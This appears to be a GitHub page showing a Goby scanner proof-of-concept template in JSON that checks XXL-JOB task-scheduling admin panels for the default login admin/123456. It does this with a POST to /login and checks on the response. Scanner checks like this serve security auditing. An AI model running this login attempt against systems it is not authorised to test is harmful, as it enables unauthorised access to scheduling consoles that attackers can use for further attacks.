-
Notifications
You must be signed in to change notification settings - Fork 8
/
XXL_JOB_Default_password.json
62 lines (62 loc) · 2.41 KB
/
XXL_JOB_Default_password.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
{
"Name": "XXL-JOB Default password",
"Level": "2",
"Tags": [
"Default password"
],
"GobyQuery": "(app=\"XXL-JOB\" || title=\"任务调度中心\")",
"Description": "There is a default weak password in the background of xxl-job task scheduling center, so attackers can further attack in the background",
"Product": "XXL-JOB",
"Homepage": "https://www.xuxueli.com/xxl-job/",
"Author": "PeiQi",
"Impact": "<p>Attackers can further attack in the background<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "POST",
"uri": "/login",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"data_type": "text",
"data": "userName=admin&password=123456"
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "not contains",
"value": "500",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-04 22:53:01",
"GobyVersion": "1.8.255"
}